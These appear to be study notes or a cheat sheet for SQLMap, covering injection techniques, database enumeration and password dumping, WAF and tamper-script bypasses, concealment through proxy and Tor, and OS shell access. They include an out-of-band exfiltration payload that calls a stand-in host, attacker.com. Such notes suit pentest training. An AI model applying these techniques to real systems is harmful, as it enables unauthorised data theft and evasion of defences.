SQLMap
SQLMap can use JSON and XML in req bodies as well
Target connection
Injection detection
Fingerprinting
Protection detection and bypass using "tamper" scripts
Database content retrieval
Execution of the operating system (OS) commands
$ sudo apt install sqlmap
$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
$ python sqlmap.py # if via git clone above
Injection Types
Out of bands (not sure the syntax)
LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))
--batch is to skip any required user input
Using Full request
Custom requests
--referer , --host , -A/--user-agent , --method
--random-agent to randomize UA
--mobile to imitate mobile
Prefix and Suffix
--risk is the risk of the payload to cause problem or DoS
--level increases the bounds (lower expectancy, higher level)
--level=1 --risk=1 is 72 payloads while --level=5 --risk=3 is 7865
--code=200 for true responses
--titles=<title>
--string=success
--text-only for visible content only
--technique=BEU (boolean, error, union)
--union-cols=17
--union-char='a' this will use union select 'a','a','a'
--union-from=users if there is an appendix requirement like in oracle
Database Enumeration
--banner is version
--current-user is user
--current-db is database()
--is-dba is admin rights
--dump-format html/csv
-C username,password for retrieving specific columns
--start=2 --stop=3 for retrieving rows 2-3
--where="name LIKE 'f%'" for conditional enumeration
--dump to dump the current specified table (or dump whole db if no -T)
--dump-all to dump all the content from all dbs
--schema for complete overview of db structure
--search -T user search for table that matches "user"
--search -C pass search for columns that matches "pass"
--passwords to dump passwords from other db?? like in mysql.users
--all --batch will do everything automatically
Bypassing Web Application Protections
Anti CSRF Token Bypass
Unique Value Bypass
Calculated Parameter Bypass
IP Address Concealing
--proxy="socks4://177.39.187.70:33283"
--proxy-file
--tor
--check-tor to check if tor properly setup
--skip-waf to skip WAF heuristic checks
User-Agent Blacklisting Bypass
--random-agent
Replaces instances of UNION with e0UNION
Base64-encodes all characters in a given payload
Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart
Replaces all occurrences of operator equal (=) with LIKE counterpart
halfversionedmorekeywords
Adds (MySQL) versioned comment before each keyword
Embraces complete query with (MySQL) versioned comment
Embraces complete query with (MySQL) zero-versioned comment
Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Replaces space character ( ) with comments `/
Replaces space character ( ) with a dash comment (--) followed by a random string and a new line ()
Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line ()
Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters
Replaces space character ( ) with plus (+)
Replaces space character ( ) with a random blank character from a valid set of alternate characters
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
Encloses each non-function keyword with (MySQL) versioned comment
Encloses each keyword with (MySQL) versioned comment
Miscellaneous Bypass
--chunked to split post request's body
Reading Files and RCE
Note in --os-shell, try different --techniques if applicable